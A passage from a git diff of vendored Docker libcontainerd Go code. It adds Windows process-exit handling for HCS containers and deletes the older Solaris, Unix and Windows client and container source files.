+			logger.WithError(err).Warnf("unable to get exit code for process")
+		}
+		// Since we got an error retrieving the exit code, make sure that the
+		// code we return doesn't incorrectly indicate success.
+		exitCode = -1
+
+		// Fall through here, do not return. This ensures we attempt to
+		// continue the shutdown in HCS and tell the docker engine that the
+		// process/container has exited to avoid a container being dropped on
+		// the floor.
+	}
+
+	if err := p.hcsProcess.Close(); err != nil {
+		logger.WithError(err).Warnf("failed to cleanup hcs process resources")
+		exitCode = -1
+		eventErr = fmt.Errorf("hcsProcess.Close() failed %s", err)
+	}
+
+	if p.id == InitProcessName {
+		// Update container status
+		ctr.Lock()
+		ctr.status = StatusStopped
+		ctr.exitedAt = exitedAt
+		ctr.exitCode = uint32(exitCode)
+		close(ctr.waitCh)
+		ctr.Unlock()
+
+		if err := c.shutdownContainer(ctr); err != nil {
+			exitCode = -1
+			logger.WithError(err).Warn("failed to shutdown container")
+			thisErr := fmt.Errorf("failed to shutdown container: %s", err)
+			if eventErr != nil {
+				eventErr = fmt.Errorf("%s: %s", eventErr, thisErr)
+			} else {
+				eventErr = thisErr
+			}
+		} else {
+			logger.Debug("completed container shutdown")
+		}
+
+		if err := ctr.hcsContainer.Close(); err != nil {
+			exitCode = -1
+			logger.WithError(err).Error("failed to clean hcs container resources")
+			thisErr := fmt.Errorf("failed to terminate container: %s", err)
+			if eventErr != nil {
+				eventErr = fmt.Errorf("%s: %s", eventErr, thisErr)
+			} else {
+				eventErr = thisErr
+			}
+		}
+	}
+
+	c.eventQ.append(ctr.id, func() {
+		ei := EventInfo{
+			ContainerID: ctr.id,
+			ProcessID:   p.id,
+			Pid:         uint32(p.pid),
+			ExitCode:    uint32(exitCode),
+			ExitedAt:    exitedAt,
+			Error:       eventErr,
+		}
+		c.logger.WithFields(logrus.Fields{
+			"container":  ctr.id,
+			"event":      EventExit,
+			"event-info": ei,
+		}).Info("sending event")
+		err := c.backend.ProcessEvent(ctr.id, EventExit, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container":  ctr.id,
+				"event":      EventExit,
+				"event-info": ei,
+			}).Error("failed to process event")
+		}
+		if p.id != InitProcessName {
+			ctr.Lock()
+			delete(ctr.execs, p.id)
+			ctr.Unlock()
+		}
+	})
+
+	return exitCode
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go
deleted file mode 100644
index cb939975f8..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go
+++ /dev/null
@@ -1,101 +0,0 @@
-package libcontainerd
-
-import "golang.org/x/net/context"
-
-type client struct {
-	clientCommon
-
-	// Platform specific properties below here.
-	remote        *remote
-	q             queue
-	exitNotifiers map[string]*exitNotifier
-	liveRestore   bool
-}
-
-// GetServerVersion returns the connected server version information
-func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
-	resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{})
-	if err != nil {
-		return nil, err
-	}
-
-	sv := &ServerVersion{
-		GetServerVersionResponse: *resp,
-	}
-
-	return sv, nil
-}
-
-func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) {
-	return -1, nil
-}
-
-func (clnt *client) SignalProcess(containerID string, pid string, sig int) error {
-	return nil
-}
-
-func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
-	return nil
-}
-
-func (clnt *client) Pause(containerID string) error {
-	return nil
-}
-
-func (clnt *client) Resume(containerID string) error {
-	return nil
-}
-
-func (clnt *client) Stats(containerID string) (*Stats, error) {
-	return nil, nil
-}
-
-func (clnt *client) getExitNotifier(containerID string) *exitNotifier {
-	clnt.mapMutex.RLock()
-	defer clnt.mapMutex.RUnlock()
-	return clnt.exitNotifiers[containerID]
-}
-
-func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier {
-	clnt.mapMutex.Lock()
-	defer clnt.mapMutex.Unlock()
-	w, ok := clnt.exitNotifiers[containerID]
-	if !ok {
-		w = &exitNotifier{c: make(chan struct{}), client: clnt}
-		clnt.exitNotifiers[containerID] = w
-	}
-	return w
-}
-
-// Restore is the handler for restoring a container
-func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error {
-	return nil
-}
-
-func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
-	return nil, nil
-}
-
-// Summary returns a summary of the processes running in a container.
-func (clnt *client) Summary(containerID string) ([]Summary, error) {
-	return nil, nil
-}
-
-// UpdateResources updates resources for a running container.
-func (clnt *client) UpdateResources(containerID string, resources Resources) error {
-	// Updating resource isn't supported on Solaris
-	// but we should return nil for enabling updating container
-	return nil
-}
-
-func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
-	return nil
-}
-
-func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
-	return nil
-}
-
-func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
-	return nil, nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go
deleted file mode 100644
index 21e8fea666..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/client_unix.go
+++ /dev/null
@@ -1,142 +0,0 @@
-// +build linux solaris
-
-package libcontainerd
-
-import (
-	"encoding/json"
-	"fmt"
-	"os"
-	"path/filepath"
-	"strings"
-	"sync"
-
-	"github.com/Sirupsen/logrus"
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/docker/docker/pkg/idtools"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
-	"golang.org/x/net/context"
-)
-
-func (clnt *client) prepareBundleDir(uid, gid int) (string, error) {
-	root, err := filepath.Abs(clnt.remote.stateDir)
-	if err != nil {
-		return "", err
-	}
-	if uid == 0 && gid == 0 {
-		return root, nil
-	}
-	p := string(filepath.Separator)
-	for _, d := range strings.Split(root, string(filepath.Separator))[1:] {
-		p = filepath.Join(p, d)
-		fi, err := os.Stat(p)
-		if err != nil && !os.IsNotExist(err) {
-			return "", err
-		}
-		if os.IsNotExist(err) || fi.Mode()&1 == 0 {
-			p = fmt.Sprintf("%s.%d.%d", p, uid, gid)
-			if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) {
-				return "", err
-			}
-		}
-	}
-	return p, nil
-}
-
-func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-
-	if _, err := clnt.getContainer(containerID); err == nil {
-		return fmt.Errorf("Container %s is already active", containerID)
-	}
-
-	uid, gid, err := getRootIDs(specs.Spec(spec))
-	if err != nil {
-		return err
-	}
-	dir, err := clnt.prepareBundleDir(uid, gid)
-	if err != nil {
-		return err
-	}
-
-	container := clnt.newContainer(filepath.Join(dir, containerID), options...)
-	if err := container.clean(); err != nil {
-		return err
-	}
-
-	defer func() {
-		if err != nil {
-			container.clean()
-			clnt.deleteContainer(containerID)
-		}
-	}()
-
-	if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) {
-		return err
-	}
-
-	f, err := os.Create(filepath.Join(container.dir, configFilename))
-	if err != nil {
-		return err
-	}
-	defer f.Close()
-	if err := json.NewEncoder(f).Encode(spec); err != nil {
-		return err
-	}
-
-	return container.start(checkpoint, checkpointDir, attachStdio)
-}
-
-func (clnt *client) Signal(containerID string, sig int) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	_, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{
-		Id:     containerID,
-		Pid:    InitFriendlyName,
-		Signal: uint32(sig),
-	})
-	return err
-}
-
-func (clnt *client) newContainer(dir string, options ...CreateOption) *container {
-	container := &container{
-		containerCommon: containerCommon{
-			process: process{
-				dir: dir,
-				processCommon: processCommon{
-					containerID:  filepath.Base(dir),
-					client:       clnt,
-					friendlyName: InitFriendlyName,
-				},
-			},
-			processes: make(map[string]*process),
-		},
-	}
-	for _, option := range options {
-		if err := option.Apply(container); err != nil {
-			logrus.Errorf("libcontainerd: newContainer(): %v", err)
-		}
-	}
-	return container
-}
-
-type exitNotifier struct {
-	id     string
-	client *client
-	c      chan struct{}
-	once   sync.Once
-}
-
-func (en *exitNotifier) close() {
-	en.once.Do(func() {
-		close(en.c)
-		en.client.mapMutex.Lock()
-		if en == en.client.exitNotifiers[en.id] {
-			delete(en.client.exitNotifiers, en.id)
-		}
-		en.client.mapMutex.Unlock()
-	})
-}
-func (en *exitNotifier) wait() <-chan struct{} {
-	return en.c
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go
deleted file mode 100644
index ddcf321c85..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/client_windows.go
+++ /dev/null
@@ -1,631 +0,0 @@
-package libcontainerd
-
-import (
-	"errors"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"strings"
-	"syscall"
-
-	"golang.org/x/net/context"
-
-	"github.com/Microsoft/hcsshim"
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/pkg/sysinfo"
-	"github.com/opencontainers/runtime-spec/specs-go"
-)
-
-type client struct {
-	clientCommon
-
-	// Platform specific properties below here (none presently on Windows)
-}
-
-// Win32 error codes that are used for various workarounds
-// These really should be ALL_CAPS to match golangs syscall library and standard
-// Win32 error conventions, but golint insists on CamelCase.
-const (
-	CoEClassstring     = syscall.Errno(0x800401F3) // Invalid class string
-	ErrorNoNetwork     = syscall.Errno(1222)       // The network is not present or not started
-	ErrorBadPathname   = syscall.Errno(161)        // The specified path is invalid
-	ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object
-)
-
-// defaultOwner is a tag passed to HCS to allow it to differentiate between
-// container creator management stacks. We hard code "docker" in the case
-// of docker.
-const defaultOwner = "docker"
-
-// Create is the entrypoint to create a container from a spec, and if successfully
-// created, start it too. Table below shows the fields required for HCS JSON calling parameters,
-// where if not populated, is omitted.
-// +-----------------+--------------------------------------------+---------------------------------------------------+
-// |                 | Isolation=Process                          | Isolation=Hyper-V                                 |
-// +-----------------+--------------------------------------------+---------------------------------------------------+
-// | VolumePath      | \\?\\Volume{GUIDa}                         |                                                   |
-// | LayerFolderPath | %root%\windowsfilter\containerID           | %root%\windowsfilter\containerID (servicing only) |
-// | Layers[]        | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID        |
-// | SandboxPath     |                                            | %root%\windowsfilter                              |
-// | HvRuntime       |                                            | ImagePath=%root%\BaseLayerID\UtilityVM            |
-// +-----------------+--------------------------------------------+---------------------------------------------------+
-//
-// Isolation=Process example:
-//
-// {
-//	"SystemType": "Container",
-//	"Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
-//	"Owner": "docker",
-//	"IsDummy": false,
-//	"VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}",
-//	"IgnoreFlushesDuringBoot": true,
-//	"LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
-//	"Layers": [{
-//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
-//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
-//	}],
-//	"HostName": "5e0055c814a6",
-//	"MappedDirectories": [],
-//	"HvPartition": false,
-//	"EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"],
-//	"Servicing": false
-//}
-//
-// Isolation=Hyper-V example:
-//
-//{
-//	"SystemType": "Container",
-//	"Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d",
-//	"Owner": "docker",
-//	"IsDummy": false,
-//	"IgnoreFlushesDuringBoot": true,
-//	"Layers": [{
-//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
-//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
-//	}],
-//	"HostName": "475c2c58933b",
-//	"MappedDirectories": [],
-//	"SandboxPath": "C:\\\\control\\\\windowsfilter",
-//	"HvPartition": true,
-//	"EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"],
-//	"HvRuntime": {
-//		"ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM"
-//	},
-//	"Servicing": false
-//}
-func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	logrus.Debugln("libcontainerd: client.Create() with spec", spec)
-
-	configuration := &hcsshim.ContainerConfig{
-		SystemType: "Container",
-		Name:       containerID,
-		Owner:      defaultOwner,
-		IgnoreFlushesDuringBoot: false,
-		HostName:                spec.Hostname,
-		HvPartition:             false,
-	}
-
-	if spec.Windows.Resources != nil {
-		if spec.Windows.Resources.CPU != nil {
-			if spec.Windows.Resources.CPU.Count != nil {
-				// This check is being done here rather than in adaptContainerSettings
-				// because we don't want to update the HostConfig in case this container
-				// is moved to a host with more CPUs than this one.
-				cpuCount := *spec.Windows.Resources.CPU.Count
-				hostCPUCount := uint64(sysinfo.NumCPU())
-				if cpuCount > hostCPUCount {
-					logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount)
-					cpuCount = hostCPUCount
-				}
-				configuration.ProcessorCount = uint32(cpuCount)
-			}
-			if spec.Windows.Resources.CPU.Shares != nil {
-				configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares)
-			}
-			if spec.Windows.Resources.CPU.Percent != nil {
-				configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000
-			}
-		}
-		if spec.Windows.Resources.Memory != nil {
-			if spec.Windows.Resources.Memory.Limit != nil {
-				configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024
-			}
-		}
-		if spec.Windows.Resources.Storage != nil {
-			if spec.Windows.Resources.Storage.Bps != nil {
-				configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps
-			}
-			if spec.Windows.Resources.Storage.Iops != nil {
-				configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops
-			}
-		}
-	}
-
-	var layerOpt *LayerOption
-	for _, option := range options {
-		if s, ok := option.(*ServicingOption); ok {
-			configuration.Servicing = s.IsServicing
-			continue
-		}
-		if f, ok := option.(*FlushOption); ok {
-			configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot
-			continue
-		}
-		if h, ok := option.(*HyperVIsolationOption); ok {
-			configuration.HvPartition = h.IsHyperV
-			configuration.SandboxPath = h.SandboxPath
-			continue
-		}
-		if l, ok := option.(*LayerOption); ok {
-			layerOpt = l
-		}
-		if n, ok := option.(*NetworkEndpointsOption); ok {
-			configuration.EndpointList = n.Endpoints
-			configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery
-			continue
-		}
-		if c, ok := option.(*CredentialsOption); ok {
-			configuration.Credentials = c.Credentials
-			continue
-		}
-	}
-
-	// We must have a layer option with at least one path
-	if layerOpt == nil || layerOpt.LayerPaths == nil {
-		return fmt.Errorf("no layer option or paths were supplied to the runtime")
-	}
-
-	if configuration.HvPartition {
-		// Find the upper-most utility VM image, since the utility VM does not
-		// use layering in RS1.
-		// TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable.
-		var uvmImagePath string
-		for _, path := range layerOpt.LayerPaths {
-			fullPath := filepath.Join(path, "UtilityVM")
-			_, err := os.Stat(fullPath)
-			if err == nil {
-				uvmImagePath = fullPath
-				break
-			}
-			if !os.IsNotExist(err) {
-				return err
-			}
-		}
-		if uvmImagePath == "" {
-			return errors.New("utility VM image could not be found")
-		}
-		configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath}
-	} else {
-		configuration.VolumePath = spec.Root.Path
-	}
-
-	configuration.LayerFolderPath = layerOpt.LayerFolderPath
-
-	for _, layerPath := range layerOpt.LayerPaths {
-		_, filename := filepath.Split(layerPath)
-		g, err := hcsshim.NameToGuid(filename)
-		if err != nil {
-			return err
-		}
-		configuration.Layers = append(configuration.Layers, hcsshim.Layer{
-			ID:   g.ToString(),
-			Path: layerPath,
-		})
-	}
-
-	// Add the mounts (volumes, bind mounts etc) to the structure
-	mds := make([]hcsshim.MappedDir, len(spec.Mounts))
-	for i, mount := range spec.Mounts {
-		mds[i] = hcsshim.MappedDir{
-			HostPath:      mount.Source,
-			ContainerPath: mount.Destination,
-			ReadOnly:      false,
-		}
-		for _, o := range mount.Options {
-			if strings.ToLower(o) == "ro" {
-				mds[i].ReadOnly = true
-			}
-		}
-	}
-	configuration.MappedDirectories = mds
-
-	hcsContainer, err := hcsshim.CreateContainer(containerID, configuration)
-	if err != nil {
-		return err
-	}
-
-	// Construct a container object for calling start on it.
-	container := &container{
-		containerCommon: containerCommon{
-			process: process{
-				processCommon: processCommon{
-					containerID:  containerID,
-					client:       clnt,
-					friendlyName: InitFriendlyName,
-				},
-				commandLine: strings.Join(spec.Process.Args, " "),
-			},
-			processes: make(map[string]*process),
-		},
-		ociSpec:      spec,
-		hcsContainer: hcsContainer,
-	}
-
-	container.options = options
-	for _, option := range options {
-		if err := option.Apply(container); err != nil {
-			logrus.Errorf("libcontainerd: %v", err)
-		}
-	}
-
-	// Call start, and if it fails, delete the container from our
-	// internal structure, start will keep HCS in sync by deleting the
-	// container there.
-	logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID)
-	if err := container.start(attachStdio); err != nil {
-		clnt.deleteContainer(containerID)
-		return err
-	}
-
-	logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID)
-	return nil
-
-}
-
-// AddProcess is the handler for adding a process to an already running
-// container. It's called through docker exec. It returns the system pid of the
-// exec'd process.
-func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return -1, err
-	}
-	// Note we always tell HCS to
-	// create stdout as it's required regardless of '-i' or '-t' options, so that
-	// docker can always grab the output through logs. We also tell HCS to always
-	// create stdin, even if it's not used - it will be closed shortly. Stderr
-	// is only created if it we're not -t.
-	createProcessParms := hcsshim.ProcessConfig{
-		EmulateConsole:   procToAdd.Terminal,
-		CreateStdInPipe:  true,
-		CreateStdOutPipe: true,
-		CreateStdErrPipe: !procToAdd.Terminal,
-	}
-	createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height)
-	createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width)
-
-	// Take working directory from the process to add if it is defined,
-	// otherwise take from the first process.
-	if procToAdd.Cwd != "" {
-		createProcessParms.WorkingDirectory = procToAdd.Cwd
-	} else {
-		createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd
-	}
-
-	// Configure the environment for the process
-	createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env)
-	createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ")
-	createProcessParms.User = procToAdd.User.Username
-
-	logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine)
-
-	// Start the command running in the container.
-	var stdout, stderr io.ReadCloser
-	var stdin io.WriteCloser
-	newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms)
-	if err != nil {
-		logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err)
-		return -1, err
-	}
-
-	pid := newProcess.Pid()
-
-	stdin, stdout, stderr, err = newProcess.Stdio()
-	if err != nil {
-		logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err)
-		return -1, err
-	}
-
-	iopipe := &IOPipe{Terminal: procToAdd.Terminal}
-	iopipe.Stdin = createStdInCloser(stdin, newProcess)
-
-	// Convert io.ReadClosers to io.Readers
-	if stdout != nil {
-		iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout})
-	}
-	if stderr != nil {
-		iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr})
-	}
-
-	proc := &process{
-		processCommon: processCommon{
-			containerID:  containerID,
-			friendlyName: processFriendlyName,
-			client:       clnt,
-			systemPid:    uint32(pid),
-		},
-		commandLine: createProcessParms.CommandLine,
-		hcsProcess:  newProcess,
-	}
-
-	// Add the process to the container's list of processes
-	container.processes[processFriendlyName] = proc
-
-	// Tell the engine to attach streams back to the client
-	if err := attachStdio(*iopipe); err != nil {
-		return -1, err
-	}
-
-	// Spin up a go routine waiting for exit to handle cleanup
-	go container.waitExit(proc, false)
-
-	return pid, nil
-}
-
-// Signal handles `docker stop` on Windows. While Linux has support for
-// the full range of signals, signals aren't really implemented on Windows.
-// We fake supporting regular stop and -9 to force kill.
-func (clnt *client) Signal(containerID string, sig int) error {
-	var (
-		cont *container
-		err  error
-	)
-
-	// Get the container as we need it to get the container handle.
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	if cont, err = clnt.getContainer(containerID); err != nil {
-		return err
-	}
-
-	cont.manualStopRequested = true
-
-	logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid)
-
-	if syscall.Signal(sig) == syscall.SIGKILL {
-		// Terminate the compute system
-		if err := cont.hcsContainer.Terminate(); err != nil {
-			if !hcsshim.IsPending(err) {
-				logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err)
-			}
-		}
-	} else {
-		// Terminate Process
-		if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) {
-			// ignore errors
-			logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err)
-		}
-	}
-
-	return nil
-}
-
-// While Linux has support for the full range of signals, signals aren't really implemented on Windows.
-// We try to terminate the specified process whatever signal is requested.
-func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error {
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	cont, err := clnt.getContainer(containerID)
-	if err != nil {
-		return err
-	}
-
-	for _, p := range cont.processes {
-		if p.friendlyName == processFriendlyName {
-			return p.hcsProcess.Kill()
-		}
-	}
-
-	return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID)
-}
-
-// Resize handles a CLI event to resize an interactive docker run or docker exec
-// window.
-func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
-	// Get the libcontainerd container object
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	cont, err := clnt.getContainer(containerID)
-	if err != nil {
-		return err
-	}
-
-	h, w := uint16(height), uint16(width)
-
-	if processFriendlyName == InitFriendlyName {
-		logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid)
-		return cont.process.hcsProcess.ResizeConsole(w, h)
-	}
-
-	for _, p := range cont.processes {
-		if p.friendlyName == processFriendlyName {
-			logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid)
-			return p.hcsProcess.ResizeConsole(w, h)
-		}
-	}
-
-	return fmt.Errorf("Resize could not find containerID %s to resize", containerID)
-
-}
-
-// Pause handles pause requests for containers
-func (clnt *client) Pause(containerID string) error {
-	unlockContainer := true
-	// Get the libcontainerd container object
-	clnt.lock(containerID)
-	defer func() {
-		if unlockContainer {
-			clnt.unlock(containerID)
-		}
-	}()
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return err
-	}
-
-	for _, option := range container.options {
-		if h, ok := option.(*HyperVIsolationOption); ok {
-			if !h.IsHyperV {
-				return errors.New("cannot pause Windows Server Containers")
-			}
-			break
-		}
-	}
-
-	err = container.hcsContainer.Pause()
-	if err != nil {
-		return err
-	}
-
-	// Unlock container before calling back into the daemon
-	unlockContainer = false
-	clnt.unlock(containerID)
-
-	return clnt.backend.StateChanged(containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State: StatePause,
-		}})
-}
-
-// Resume handles resume requests for containers
-func (clnt *client) Resume(containerID string) error {
-	unlockContainer := true
-	// Get the libcontainerd container object
-	clnt.lock(containerID)
-	defer func() {
-		if unlockContainer {
-			clnt.unlock(containerID)
-		}
-	}()
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return err
-	}
-
-	// This should never happen, since Windows Server Containers cannot be paused
-	for _, option := range container.options {
-		if h, ok := option.(*HyperVIsolationOption); ok {
-			if !h.IsHyperV {
-				return errors.New("cannot resume Windows Server Containers")
-			}
-			break
-		}
-	}
-
-	err = container.hcsContainer.Resume()
-	if err != nil {
-		return err
-	}
-
-	// Unlock container before calling back into the daemon
-	unlockContainer = false
-	clnt.unlock(containerID)
-
-	return clnt.backend.StateChanged(containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State: StateResume,
-		}})
-}
-
-// Stats handles stats requests for containers
-func (clnt *client) Stats(containerID string) (*Stats, error) {
-	// Get the libcontainerd container object
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return nil, err
-	}
-	s, err := container.hcsContainer.Statistics()
-	if err != nil {
-		return nil, err
-	}
-	st := Stats(s)
-	return &st, nil
-}
-
-// Restore is the handler for restoring a container
-func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error {
-	// TODO Windows: Implement this. For now, just tell the backend the container exited.
-	logrus.Debugf("libcontainerd: Restore(%s)", containerID)
-	return clnt.backend.StateChanged(containerID, StateInfo{
-		CommonStateInfo: CommonStateInfo{
-			State:    StateExit,
-			ExitCode: 1 << 31,
-		}})
-}
-
-// GetPidsForContainer returns a list of process IDs running in a container.
-// Although implemented, this is not used in Windows.
-func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
-	var pids []int
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	cont, err := clnt.getContainer(containerID)
-	if err != nil {
-		return nil, err
-	}
-
-	// Add the first process
-	pids = append(pids, int(cont.containerCommon.systemPid))
-	// And add all the exec'd processes
-	for _, p := range cont.processes {
-		pids = append(pids, int(p.processCommon.systemPid))
-	}
-	return pids, nil
-}
-
-// Summary returns a summary of the processes running in a container.
-// This is present in Windows to support docker top. In linux, the
-// engine shells out to ps to get process information. On Windows, as
-// the containers could be Hyper-V containers, they would not be
-// visible on the container host. However, libcontainerd does have
-// that information.
-func (clnt *client) Summary(containerID string) ([]Summary, error) {
-
-	// Get the libcontainerd container object
-	clnt.lock(containerID)
-	defer clnt.unlock(containerID)
-	container, err := clnt.getContainer(containerID)
-	if err != nil {
-		return nil, err
-	}
-	p, err := container.hcsContainer.ProcessList()
-	if err != nil {
-		return nil, err
-	}
-	pl := make([]Summary, len(p))
-	for i := range p {
-		pl[i] = Summary(p[i])
-	}
-	return pl, nil
-}
-
-// UpdateResources updates resources for a running container.
-func (clnt *client) UpdateResources(containerID string, resources Resources) error {
-	// Updating resource isn't supported on Windows
-	// but we should return nil for enabling updating container
-	return nil
-}
-
-func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
-	return errors.New("Windows: Containers do not support checkpoints")
-}
-
-func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
-	return errors.New("Windows: Containers do not support checkpoints")
-}
-
-func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
-	return nil, errors.New("Windows: Containers do not support checkpoints")
-}
-
-func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
-	return &ServerVersion{}, nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container.go b/vendor/github.com/docker/docker/libcontainerd/container.go
deleted file mode 100644
index b40321389a..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/container.go
+++ /dev/null
@@ -1,13 +0,0 @@
-package libcontainerd
-
-const (
-	// InitFriendlyName is the name given in the lookup map of processes
-	// for the first process started in a container.
-	InitFriendlyName = "init"
-	configFilename   = "config.json"
-)
-
-type containerCommon struct {
-	process
-	processes map[string]*process
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/container_unix.go b/vendor/github.com/docker/docker/libcontainerd/container_unix.go
deleted file mode 100644
index 61bab145f2..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/container_unix.go
+++ /dev/null
@@ -1,250 +0,0 @@
-// +build linux solaris
-
-package libcontainerd
-
-import (
-	"encoding/json"
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"sync"
-	"syscall"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/docker/docker/pkg/ioutils"
-	specs "github.com/opencontainers/runtime-spec/specs-go"
-	"github.com/tonistiigi/fifo"
-	"golang.org/x/net/context"
-)
-
-type container struct {
-	containerCommon
-
-	// Platform specific fields are below here.
-	pauseMonitor
-	oom         bool
-	runtime     string
-	runtimeArgs []string
-}
-
-type runtime struct {
-	path string
-	args []string
-}
-
-// WithRuntime sets the runtime to be used for the created container
-func WithRuntime(path string, args []string) CreateOption {
